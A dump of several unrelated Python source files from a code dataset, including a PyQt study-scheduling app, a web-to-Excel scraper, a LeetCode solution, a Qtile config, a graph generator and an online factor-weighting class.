datetime.timedelta(days=7)).isoformat()\n self.label_4.setText(\n \"

    This Week

    \")\n\n with open(memory, 'r') as jsonmem:\n # Get all this week's events using iso date handling\n sessions = [item for item in load(jsonmem) if item['type'].lower() == 'session']\n thisweek = [item for item in sessions if\n date_today <= datefromiso(item['start_time']) <= datefromiso(weeklater)]\n thisweek = sorted(thisweek, key=lambda k: k['start_time'])\n\n for item in thisweek:\n self.eventcheckbox = QtWidgets.QCheckBox(self.gridlayout)\n self.eventcheckbox.setText(item['description'])\n for key, value in subjectgroups.items(): # Colour codes the session appropriately.\n if item['subject'] in value:\n self.eventcheckbox.setStyleSheet(\"background-color:\" + colour_dict[key] + '; \\n')\n break\n self.gridLayout.addWidget(self.eventcheckbox, boxnumber, 0, 1, 1)\n boxnumber += 1\n\n def createform(self):\n self.window = QtWidgets.QMainWindow()\n self.dialog = FormWindow(self.window)\n self.window.show()\n\n def createsessionform(self):\n self.window = QtWidgets.QMainWindow()\n self.dialog = Sessionform(self.window)\n self.window.show()\n\n def showcalendar(self):\n self.window = QtWidgets.QDialog()\n self.window.setStyleSheet(\"background-color:black\")\n self.dialog = Calendar(self.window)\n self.window.show()\n\n def setdarktheme(self):\n stylesheet = '''\n border-width: 2px;\n border-radius: 4px;\n padding: 2px;\n border-style: outset;\n border-color:#00FFFF\n '''\n\n with open('dark.qss', 'r') as theme:\n self.MainWindow.setStyleSheet(theme.read())\n self.todaybutton.setStyleSheet(stylesheet)\n self.weekbutton.setStyleSheet(stylesheet)\n self.eventlist.setStyleSheet(stylesheet)\n self.calendarbutton.setStyleSheet(stylesheet)\n self.newexambutton.setStyleSheet(stylesheet)\n self.newsessionbutton.setStyleSheet(stylesheet)\n self.label_4.setStyleSheet(\"color:cyan;\")\n self.darktheme = True\n self.label_4.setText(\n \"

    Today

    \")\n\n def setlighttheme(self):\n stylesheet = '''border-style: outset;\\n\n border-width: 2px;\\n\n border-radius: 4px;\\n\n border-color: blue\\n\n\n '''\n orangestylesheet = '''border-style: outset;\\n\n border-width: 2px;\\n\n border-radius: 4px;\\n\n border-color: darkorange\\n\n '''\n\n with open('light.qss', 'r') as theme:\n self.MainWindow.setStyleSheet(theme.read())\n self.todaybutton.setStyleSheet(stylesheet)\n self.label_4.setStyleSheet(\"color:blue;\")\n self.weekbutton.setStyleSheet(stylesheet)\n self.eventlist.setStyleSheet(stylesheet)\n self.calendarbutton.setStyleSheet(stylesheet)\n self.newexambutton.setStyleSheet(orangestylesheet)\n self.newsessionbutton.setStyleSheet(orangestylesheet)\n self.darktheme = False\n self.label_4.setText(\n \"

    Today

    \")\n\n def changetheme(self):\n with open('theme.json', mode='r') as memory:\n s = load(memory)\n if not s[\"darktheme\"]:\n self.setdarktheme()\n theme = '''{\"darktheme\":true}'''\n else:\n self.setlighttheme()\n theme = '''{\"darktheme\":false}'''\n with open('theme.json', mode='w') as memory:\n memory.write(theme)\n\n def schedule(self, event: dict, wordcount, chaptercount):\n self.window.close()\n deadline_date = datefromiso(event['deadline'])\n days_available = daysBetween(datetime.date.fromisoformat(deadline_date)) # start time is iso string\n time_required = wordcount / 250 + chaptercount * 1.5 # 90mins/chapter, and 250 words an hour.\n daily_sessions = round(\n time_required / days_available) if days_available > 0 else time_required # time required is a plain number of hours\n frontloaded_days_int = round(days_available / 2) if days_available > 1 else 1 # number of days\n\n for i in range(1, frontloaded_days_int + 1): # Everything within here repeats once a day\n\n for session in range(5, round(min(2 * 2 * daily_sessions + 9, 18)),\n 2):\n # Creates a new session 30 mins later, this block repeats within a single day TODO: Possibly refine using hours and minutes\n self.write_session(datetime.time(hour=session), i, event)\n\n\n for j in range(frontloaded_days_int, days_available):\n for session in range(5, min(3 * daily_sessions + 9, 18), 3): # Caps the number of daily sessions\n self.write_session(datetime.time(hour=session), j,event)\n\n def write_session(self, time,\n displacement,\n memory_dict): # Time refers to the starting time(not date) of the session. Displacement refers to the hours/time before the session\n\n precomputed_end =(datetime.time(hour=time.hour + 1, minute=time.minute + 30)).isoformat()\n # Ninety minutes later,for duration of session\n session_summary = memory_dict['notes'] if memory_dict['notes'] \\\n else \"Study Session \" + memory_dict['subject']\n constructed_date =(datetime.datetime.now().date() + datetime.timedelta(days=displacement)).isoformat()\n eventID = randomiser_for_ids()\n # Constructs a date using time and displacement parameters\n\n session = {\n 'event_id': eventID,\n 'name': '',\n 'subject': memory_dict['subject'],\n 'description': 'Work On ' + \"\\'\" + session_summary + \"\\'\",\n 'plan': '',\n 'type': 'session',\n 'start_time': constructed_date + 'T' + time.isoformat(),\n 'end_time': constructed_date + 'T' + precomputed_end + 'GST', # Adds 90 minutes\n 'deadline': None\n }\n\n cronosession = {\n 'event_id': eventID,\n 'summary': 'Work On ' + \"\\'\" + session_summary + \"\\'\",\n 'description': \"more whatnot\",\n 'start': constructed_date + 'T' + time.isoformat()+'GST',\n 'end': constructed_date + 'T' + precomputed_end+'GST',\n }\n writetoJSON(session)\n\n notificationjob = scheduler.add_job(name='notification', func=notification,\n args=[session['subject'], session['description']],\n run_date=constructed_date+'T'+time.isoformat())\n\n\nclass Sessionform(QtWidgets.QMainWindow):\n def __init__(self, MainWindow, parent=None):\n super(QtWidgets.QMainWindow, self).__init__(parent)\n MainWindow.setObjectName(\"New Session\")\n MainWindow.resize(394, 472)\n self.MainWindow = MainWindow\n self.centralWidget = QtWidgets.QWidget(MainWindow)\n self.centralWidget.setObjectName(\"centralWidget\")\n self.formLayoutWidget = QtWidgets.QWidget(self.centralWidget)\n self.formLayoutWidget.setGeometry(QtCore.QRect(0, 0, 391, 431))\n self.formLayoutWidget.setObjectName(\"formLayoutWidget\")\n self.formLayout = QtWidgets.QFormLayout(self.formLayoutWidget)\n self.formLayout.setContentsMargins(11, 11, 11, 11)\n self.formLayout.setSpacing(6)\n self.formLayout.setObjectName(\"formLayout\")\n self.label_2 = QtWidgets.QLabel(self.formLayoutWidget)\n self.label_2.setObjectName(\"label_2\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_2)\n self.subject_box = QtWidgets.QComboBox(self.formLayoutWidget)\n self.subject_box.setObjectName(\"subject_box\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.subject_box)\n self.horizontalLayout = QtWidgets.QHBoxLayout()\n self.horizontalLayout.setSpacing(6)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.formLayout.setLayout(2, QtWidgets.QFormLayout.LabelRole, self.horizontalLayout)\n self.label_4 = QtWidgets.QLabel(self.formLayoutWidget)\n self.label_4.setObjectName(\"label_4\")\n self.formLayout.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_4)\n self.dateTimeEdit = QtWidgets.QDateTimeEdit(self.formLayoutWidget)\n self.dateTimeEdit.setObjectName(\"dateTimeEdit\")\n self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.dateTimeEdit)\n self.label_3 = QtWidgets.QLabel(self.formLayoutWidget)\n self.label_3.setObjectName(\"label_3\")\n self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label_3)\n self.label_5 = QtWidgets.QLabel(self.formLayoutWidget)\n self.label_5.setObjectName(\"label_5\")\n self.formLayout.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.label_5)\n self.sessionplan = QtWidgets.QPlainTextEdit(self.formLayoutWidget)\n self.sessionplan.setObjectName(\"sessionplan\")\n self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.sessionplan)\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_4.setSpacing(6)\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\n spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_4.addItem(spacerItem)\n self.pushButton = QtWidgets.QPushButton(self.formLayoutWidget)\n self.pushButton.setMaximumSize(QtCore.QSize(200, 16777215))\n self.pushButton.setObjectName(\"pushButton\")\n self.horizontalLayout_4.addWidget(self.pushButton)\n self.formLayout.setLayout(6, QtWidgets.QFormLayout.FieldRole, self.horizontalLayout_4)\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_3.setSpacing(6)\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n self.formLayout.setLayout(8, QtWidgets.QFormLayout.LabelRole, self.horizontalLayout_3)\n self.summary = QtWidgets.QPlainTextEdit(self.formLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.summary.sizePolicy().hasHeightForWidth())\n self.summary.setSizePolicy(sizePolicy)\n self.summary.setMaximumSize(QtCore.QSize(250, 25))\n self.summary.setObjectName(\"summary\")\n self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.summary)\n MainWindow.setCentralWidget(self.centralWidget)\n self.menuBar = QtWidgets.QMenuBar(MainWindow)\n self.menuBar.setGeometry(QtCore.QRect(0, 0, 394, 22))\n self.menuBar.setObjectName(\"menuBar\")\n MainWindow.setMenuBar(self.menuBar)\n self.mainToolBar = QtWidgets.QToolBar(MainWindow)\n self.mainToolBar.setObjectName(\"mainToolBar\")\n MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.mainToolBar)\n self.statusBar = QtWidgets.QStatusBar(MainWindow)\n self.statusBar.setObjectName(\"statusBar\")\n MainWindow.setStatusBar(self.statusBar)\n for i in range(0, len(listofsubjects) - 1): self.subject_box.addItem(listofsubjects[i])\n\n self.retranslateUi(MainWindow)\n self.pushButton.clicked.connect(lambda: self.save_event())\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"New Session\", \"New Session\"))\n self.label_2.setText(_translate(\"MainWindow\", \"Subject\"))\n self.label_4.setText(_translate(\"MainWindow\", \"Date\"))\n self.label_3.setText(_translate(\"MainWindow\", \"Event\"))\n self.label_5.setText(_translate(\"MainWindow\", \"Plan/Notes\"))\n self.pushButton.setText(_translate(\"MainWindow\", \"Save Event\"))\n self.dateTimeEdit.setDate(QtCore.QDate.currentDate())\n\n def save_event(self):\n iso_date = self.dateTimeEdit.dateTime().toPyDateTime()\n iso_date_utc = iso_date.astimezone(pytz.utc).isoformat()\n plusninety_utc =(datetime.datetime.fromisoformat(iso_date_utc) + datetime.timedelta(minutes=90)).astimezone(\n pytz.utc).isoformat()\n\n eventID = randomiser_for_ids()\n memory_dict = {\n 'event_id': eventID,\n 'type': \"Session\",\n 'name': self.summary.toPlainText(),\n 'subject': self.subject_box.currentText(),\n 'start_time': iso_date_utc,\n 'end_time': plusninety_utc,\n 'deadline': iso_date_utc,\n 'plan': self.sessionplan.toPlainText(),\n 'description': self.sessionplan.toPlainText()\n }\n\n cronofy_dict = {\n 'event_id': eventID,\n 'summary': memory_dict['name'],\n 'description': self.sessionplan.toPlainText(),\n 'start': iso_date_utc,\n 'end': plusninety_utc,\n # 90 minutes later\n }\n writetoJSON(memory_dict)\n notificationjob = scheduler.add_job(name='notification', func=notification,\n args=[memory_dict['subject'], memory_dict['description']],\n run_date=iso_date_utc)\n self.close()\n\n\nclass FormWindow(QtWidgets.QMainWindow):\n\n def __init__(self, MainWindow, parent=None):\n super(QtWidgets.QMainWindow, self).__init__(parent)\n MainWindow.setObjectName(\"New Exam\")\n MainWindow.resize(355, 437)\n self.MainWindow = MainWindow\n self.centralWidget = QtWidgets.QWidget(MainWindow)\n self.centralWidget.setObjectName(\"centralWidget\")\n self.formLayoutWidget = QtWidgets.QWidget(self.centralWidget)\n self.formLayoutWidget.setGeometry(QtCore.QRect(10, 10, 341, 361))\n self.formLayoutWidget.setObjectName(\"formLayoutWidget\")\n self.formLayout = QtWidgets.QFormLayout(self.formLayoutWidget)\n self.formLayout.setContentsMargins(11, 11, 11, 11)\n self.formLayout.setSpacing(6)\n self.formLayout.setObjectName(\"formLayout\")\n self.label = QtWidgets.QLabel(self.formLayoutWidget)\n self.label.setObjectName(\"label\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label)\n self.event_type_box = QtWidgets.QComboBox(self.formLayoutWidget)\n self.event_type_box.setObjectName(\"event_type_box\")\n self.event_type_box.addItem(\"\")\n self.event_type_box.addItem(\"\")\n self.event_type_box.addItem(\"\")\n self.event_type_box.addItem(\"\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.event_type_box)\n self.label_2 = QtWidgets.QLabel(self.formLayoutWidget)\n self.label_2.setObjectName(\"label_2\")\n self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_2)\n self.subject_box = QtWidgets.QComboBox(self.formLayoutWidget)\n self.subject_box.setObjectName(\"subject_box\")\n for i in range(0, len(listofsubjects) - 1): self.subject_box.addItem(listofsubjects[i])\n self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.subject_box)\n self.horizontalLayout = QtWidgets.QHBoxLayout()\n self.horizontalLayout.setSpacing(6)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.formLayout.setLayout(3, QtWidgets.QFormLayout.LabelRole, self.horizontalLayout)\n self.label_3 = QtWidgets.QLabel(self.formLayoutWidget)\n self.label_3.setObjectName(\"label_3\")\n self.formLayout.setWidget(7, QtWidgets.QFormLayout.LabelRole, self.label_3)\n self.label_4 = QtWidgets.QLabel(self.formLayoutWidget)\n self.label_4.setObjectName(\"label_4\")\n self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label_4)\n self.dateTimeEdit = QtWidgets.QDateTimeEdit(self.formLayoutWidget)\n self.dateTimeEdit.setObjectName(\"dateTimeEdit\")\n self.dateTimeEdit.setMinimumSize(QtCore.QSize(100, 20))\n self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.dateTimeEdit)\n self.label_5 = QtWidgets.QLabel(self.formLayoutWidget)\n self.label_5.setObjectName(\"label_5\")\n self.formLayout.setWidget(8, QtWidgets.QFormLayout.LabelRole, self.label_5)\n self.summary = QtWidgets.QPlainTextEdit(self.formLayoutWidget)\n self.summary.setMaximumSize(QtCore.QSize(200, 100))\n self.summary.setObjectName(\"sessionplan\")\n self.formLayout.setWidget(7, QtWidgets.QFormLayout.FieldRole, self.summary)\n self.plan = QtWidgets.QPlainTextEdit(self.formLayoutWidget)\n self.plan.setMaximumSize(QtCore.QSize(200, 100))\n self.plan.setObjectName(\"summary\")\n self.formLayout.setWidget(8, QtWidgets.QFormLayout.FieldRole, self.plan)\n self.label_6 = QtWidgets.QLabel(self.formLayoutWidget)\n self.label_6.setObjectName(\"label_6\")\n self.formLayout.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.label_6)\n self.label_7 = QtWidgets.QLabel(self.formLayoutWidget)\n self.label_7.setObjectName(\"label_7\")\n self.formLayout.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.label_7)\n self.word_count = QtWidgets.QSpinBox(self.formLayoutWidget)\n self.word_count.setMaximum(90000)\n self.word_count.setSingleStep(200)\n self.word_count.setProperty(\"value\", 0)\n self.word_count.setObjectName(\"word_count\")\n self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.word_count)\n self.chapter_count = QtWidgets.QSpinBox(self.formLayoutWidget)\n self.chapter_count.setObjectName(\"chapter_count\")\n self.formLayout.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.chapter_count)\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_3.setSpacing(6)\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n self.formLayout.setLayout(11, QtWidgets.QFormLayout.LabelRole, self.horizontalLayout_3)\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_4.setSpacing(6)\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\n spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_4.addItem(spacerItem)\n self.save_button = QtWidgets.QPushButton(self.formLayoutWidget)\n self.save_button.setMaximumSize(QtCore.QSize(200, 16777215))\n self.save_button.setObjectName(\"pushButton\")\n self.horizontalLayout_4.addWidget(self.save_button)\n self.formLayout.setLayout(9, QtWidgets.QFormLayout.FieldRole, self.horizontalLayout_4)\n MainWindow.setCentralWidget(self.centralWidget)\n self.menuBar = QtWidgets.QMenuBar(MainWindow)\n self.menuBar.setGeometry(QtCore.QRect(0, 0, 355, 22))\n self.menuBar.setObjectName(\"menuBar\")\n MainWindow.setMenuBar(self.menuBar)\n self.mainToolBar = QtWidgets.QToolBar(MainWindow)\n self.mainToolBar.setObjectName(\"mainToolBar\")\n MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.mainToolBar)\n self.statusBar = QtWidgets.QStatusBar(MainWindow)\n self.statusBar.setObjectName(\"statusBar\")\n MainWindow.setStatusBar(self.statusBar)\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n self.save_button.clicked.connect(self.save_event)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"New Exam\", \"New Exam\"))\n self.label.setText(_translate(\"MainWindow\", \"Event type\"))\n self.dateTimeEdit.setDate(QtCore.QDate.currentDate())\n self.event_type_box.setItemText(0, _translate(\"MainWindow\", \"Exam\"))\n self.event_type_box.setItemText(1, _translate(\"MainWindow\", \"Project\"))\n self.event_type_box.setItemText(2, _translate(\"MainWindow\", \"Deadline\"))\n self.event_type_box.setItemText(3, _translate(\"MainWindow\", \"Other\"))\n self.label_2.setText(_translate(\"MainWindow\", \"Subject\"))\n self.label_3.setText(_translate(\"MainWindow\", \"Summary/Notes\"))\n self.label_4.setText(_translate(\"MainWindow\", \"Deadline\"))\n self.label_5.setText(_translate(\"MainWindow\", \"Plan\"))\n self.label_6.setText(_translate(\"MainWindow\", \"Word count\"))\n self.label_7.setText(_translate(\"MainWindow\", \"Chapter count\"))\n self.save_button.setText(_translate(\"MainWindow\", \"Save Event\"))\n\n def save_event(self):\n iso_date = self.dateTimeEdit.dateTime().toPyDateTime()\n iso_date_utc = iso_date.astimezone(pytz.utc).isoformat()\n\n eventID = randomiser_for_ids()\n memory_dict = {\n 'event_id': eventID,\n 'type': self.event_type_box.currentText(),\n 'subject': self.subject_box.currentText(),\n 'deadline': iso_date_utc,\n 'wordcount': self.word_count.value(),\n 'chaptercount': self.chapter_count.value(),\n 'notes': self.summary.toPlainText(),\n 'summary': self.plan.toPlainText(),\n 'name': self.summary.toPlainText(),\n 'description': self.summary.toPlainText()\n # Delivers a GST date/time\n }\n cronofy_dict = {\n 'event_id': eventID,\n 'summary': memory_dict['notes'],\n 'description': \"An important deadline\",\n 'start': iso_date_utc,\n 'end':(datetime.datetime.fromisoformat(iso_date_utc) + datetime.timedelta(hours=2)).isoformat()\n # 2 hours later, uses UTC\n }\n\n writetoJSON(memory_dict)\n notificationjob = scheduler.add_job(name='notification', func=notification,\n args=[memory_dict['subject'], memory_dict['description']],\n run_date=iso_date_utc)\n Ui_MainWindow.schedule(ui, memory_dict, self.word_count.value(), self.chapter_count.value())\n\n self.close()\n\n\nclass Calendar(QtWidgets.QCalendarWidget):\n def __init__(self, parent=None):\n QtWidgets.QCalendarWidget.__init__(self, parent)\n self.setMinimumSize(QtCore.QSize(500, 500))\n self.setMaximumSize(QtCore.QSize(5000, 5000))\n self.setSelectionMode(True)\n self.currentPageChanged.connect(lambda: self.updateCells())\n self.setStyleSheet(\"background-color:white;\\n color:black\")\n\n def paintCell(self, painter, rect, date):\n QtWidgets.QCalendarWidget.paintCell(self, painter, rect, date)\n with open('memory.json', mode='r') as memory:\n exams = [i for i in load(memory) if i['type'].lower() in ['deadline', 'exam', 'project', 'other']]\n x = date.toPyDate().isoformat() # ISO format of a calendar date(this should run on every cell of the calendar)\n for exam in exams:\n if x == datefromiso(exam['deadline']):\n # Finds the required colour based on the dictionary\n for(key, value) in subjectgroups.items():\n if exam['subject'] in value:\n painter.setBrush(QtGui.QColor(colour_dict[key]))\n painter.drawRect(rect)\n painter.setBrush(QtGui.QColor('#ffffff'))\n painter.drawText(rect.center(), str(date.day()))\n painter.drawText(rect.bottomLeft(), exam['subject'])\n break\n\n def screenshot(self):\n QtGui.QPixmap.grabWindow(app.desktop().winId()).save(datetime.datetime.now().isoformat(), 'jpg')\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n","sub_path":"Executable Source Code.py","file_name":"Executable Source Code.py","file_ext":"py","file_size_in_byte":40890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"451593421","text":"import xlsxwriter\nimport urllib.request\nfrom bs4 import BeautifulSoup\n\n\ndef isNumber(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n\nworkbook = xlsxwriter.Workbook('D:\\\\Study\\\\University\\\\\\excel_fix_output\\\\output.xlsx')\nworksheet = workbook.add_worksheet()\n\nworksheet.write(0, 0, 'name')\nworksheet.write(0, 1, 'Team name')\nworksheet.write(0, 2, 'repository')\nworksheet.write(0, 3, 'year')\n\n\ncount = 1\nhtml_number = 0\n\n\nfor i in range(198):\n response = urllib.request.urlopen(\n \"http://openknowledge.kotra.or.kr/browse?type=dateissued&null=&sort_by=2&order=ASC&rpp=20&etal=-1&null=&offset=\" + str(html_number))\n html_soruce = response.read()\n soup = BeautifulSoup(html_soruce)\n con = soup.find(\"div\", {\"class\": \"con\"})\n dl = con.find_all(\"dl\")\n html_number = html_number + 20\n\n for j in dl:\n dd = j.find_all(\"dd\")\n worksheet.write(count, 0, j.find(\"dt\").get_text())\n worksheet.write(count, 1, dd[0].get_text())\n strr = str(dd[1].get_text()).replace(\"-\", \"\", 2)\n\n if (isNumber(strr)):\n worksheet.write(count, 3, dd[1].get_text())\n else:\n worksheet.write(count, 2, dd[1].get_text())\n worksheet.write(count, 3, dd[2].get_text())\n count = count + 1\n\nworkbook.close()\n","sub_path":"python_module/pycharm/Crawling/kotra_crawling.py","file_name":"kotra_crawling.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"511061890","text":"#\n# @lc app=leetcode.cn id=205 lang=python\n#\n# [205] 同构字符串\n#\n\n# @lc code=start\nclass Solution(object):\n def isIsomorphic(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n map = {}\n lens = len(s)\n for i in range(lens):\n if s[i] not in map:\n if t[i] in map.values():\n return False\n map[s[i]] = t[i]\n else:\n if map[s[i]] != t[i]:\n return False\n return True\n# @lc code=end\n\n","sub_path":"Week_09/205.同构字符串.py","file_name":"205.同构字符串.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"309893468","text":"#!/usr/bin/env python3\n\n\"\"\"Main.\"\"\"\n\nimport sys\nfrom cpu import *\n\nif len(sys.argv) == 2:\n\n program = sys.argv[1]\n\nelse:\n\n program = None\n print('-----------------------------------')\n print('A default program will be executed.')\n print('-----------------------------------')\n\ncpu = CPU()\n\ncpu.load(program)\ncpu.run()","sub_path":"ls8/ls8.py","file_name":"ls8.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231311428","text":"from libqtile.command import lazy\nfrom libqtile.config import Key\n\n\nkeys = [\n # 既存のものは省略\n # ミュートの切り替え\n Key([], 'XF86AudioMute', lazy.spawn('pactl set-sink-mute 0 toggle')),\n # ボリュームを上げ下げする\n Key([], 'XF86AudioLowerVolume', lazy.spawn('pactl set-sink-volume 0 -5%')),\n Key([], 'XF86AudioRaiseVolume', lazy.spawn('pactl set-sink-volume 0 +5%')),\n # 明るさを上げ下げする\n Key([], 'XF86MonBrightnessUp', lazy.spawn('light -A 5')),\n Key([], 'XF86MonBrightnessDown', lazy.spawn('light -U 5')),\n]\n","sub_path":"pages/blog/2019/qtile-keybindings/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"149865612","text":"import random\nimport imageio\nimport pandas as pd\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nclass HullCoverConditionedUnitDiskGraphGenerator(object):\n \"\"\"\n Unit disk graph generation condition on image pixels.\n \"\"\"\n def __init__(self, args):\n \"\"\"\n Setting up the graph generator.\n :param args: Arguments object.\n \"\"\"\n self.args = args\n self.image = imageio.imread(self.args.input_path)\n self.points = {i: (random.uniform(0, 1), random.uniform(0, 1)) for i in range(self.args.point_number)}\n \n def keep_point(self, point):\n \"\"\"\n Checking whether a point is covered in the image.\n \"\"\"\n y = int((1-point[1])*self.image.shape[0])\n x = int(point[0]*self.image.shape[1])\n if self.image[y,x,0] == 0:\n keep = True\n else:\n keep = False\n return keep\n\n def create_graph(self):\n \"\"\"\n Creating a graph by first dropping the points.\n \"\"\"\n self.points = {node: point for node, point in self.points.items() if self.keep_point(point)}\n self.remaining_nodes = list(self.points.keys())\n self.reindexed_nodes = {node:index for index, node in enumerate(self.remaining_nodes)}\n self.points = {self.reindexed_nodes[k]:v for k, v in self.points.items()}\n self.graph = nx.random_geometric_graph(len(self.points.keys()), self.args.radius, pos=self.points)\n\n def plot_graph(self):\n \"\"\"\n Plotting the graph and saving the plot.\n \"\"\"\n nx.draw(self.graph,\n self.points,\n with_labels=False,\n linewidths=self.args.line_width,\n alpha=self.args.alpha,\n node_size=self.args.node_size,\n width=self.args.line_width,\n edge_color=\"gray\",\n node_color=self.args.node_color)\n plt.savefig(self.args.output_image, format=\"PNG\", dpi=self.args.dpi)\n plt.close()\n\n def save_graph(self):\n \"\"\"\n Saving the graph in an edge list format.\n \"\"\"\n pd.DataFrame(self.graph.edges(),columns = [\"node_1\",\"node_2\"], index = None).to_csv(self.args.output_edges)\n","sub_path":"src/hull_cover_graph.py","file_name":"hull_cover_graph.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"306428581","text":"import pandas as pd\nfrom os.path import abspath, join, dirname, exists\nimport os\nimport numpy as np\nimport random\nfrom itertools import combinations\n\nparent_dir_writer = abspath('result/statistic/weight')\n\nclass FaAwu(object):\n def __init__(self, n_factor, n_choose=1):\n self.n_factor = n_factor\n self.n_choose = n_choose\n self.name = 'AWU' # Additive Weight Update\n self.weights = []\n self.variant = 0\n if self.variant in [0, 1]:\n self.mask = list(combinations(range(self.n_factor), n_choose))\n self.n_comb = len(self.mask)\n elif self.variant == 2:\n self.n_comb = self.n_factor\n # method parameter\n self.eta = 1\n self.gamma = 0.01 # EE rate\n # method update parameter\n self.__w = [1] * self.n_comb\n\n def compute_weight(self, abs_ic):\n \"\"\"\n Input: abs_ic: float-array (n_time, n_factor)\n \"\"\"\n for t in range(len(abs_ic)):\n per_ic = abs_ic[t]\n weight = self.weight_update(t, per_ic)\n self.weights.append(weight)\n\n def weight_update(self, t, per_ic):\n \"\"\"\n Input: per_ic: periodic absolute ic - float-array (n_factor)\n \"\"\"\n # choose\n if self.variant == 0:\n chosen_idx = self.__draw(self.__w)\n elif self.variant == 1:\n p = [(1 - self.gamma) * w / sum(self.__w) + self.gamma / self.n_comb for w in self.__w]\n chosen_idx = self.__draw(p)\n elif self.variant == 2:\n chosen_idx = self.__top(self.__w)\n\n # update\n for i in range(self.n_comb):\n if self.variant in [0, 1]:\n reward = 0\n for j in range(self.n_choose):\n reward += per_ic[self.mask[i][j]]\n self.__w[i] += self.eta * reward\n elif self.variant == 2:\n self.__w[i] += self.eta * per_ic[i]\n\n weight = [0] * self.n_factor\n for j in range(self.n_choose):\n if self.variant in [0, 1]:\n weight[self.mask[chosen_idx][j]] = 1\n elif self.variant == 2:\n weight[chosen_idx[j]] = 1\n return weight\n\n def __draw(self, weights):\n \"\"\"\n Function: draw from uniform distribution\n Input: weights: float-list (n_stock)\n Output: index: chosen index\n \"\"\"\n choice = random.uniform(0, sum(weights))\n index = 0\n for weight in weights:\n choice -= weight\n if choice <= 0:\n return index\n index += 1\n return len(weights) - 1\n\n def __top(self, weights):\n \"\"\"\n Function: select top n_choose weight\n Input: weights: float-list (n_stock)\n Output: index: int-list (n_choose)\n \"\"\"\n choice = np.argsort(weights)[::-1]\n index = []\n for i in range(self.n_choose):\n index.append(choice[i])\n return index\n\n def write_weight(self, file_name):\n \"\"\"\n Function: write weights\n Input file_name: name of file\n \"\"\"\n file_name = 'fa-weight-' + file_name + '.csv'\n if exists(parent_dir_writer) == False:\n os.mkdir(parent_dir_writer)\n path = abspath(join(parent_dir_writer, file_name))\n pd_data = pd.DataFrame(self.weights)\n pd_data.to_csv(path, index=False, sep=',')\n","sub_path":"algorithm/olps/factor_awu.py","file_name":"factor_awu.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"322637106","text":"# -*- coding: utf-8 -*-\n# 3rd Party\nfrom __future__ import division\nimport logging\nlog = logging.getLogger('cc.lib.image')\n# django\nfrom django.conf import 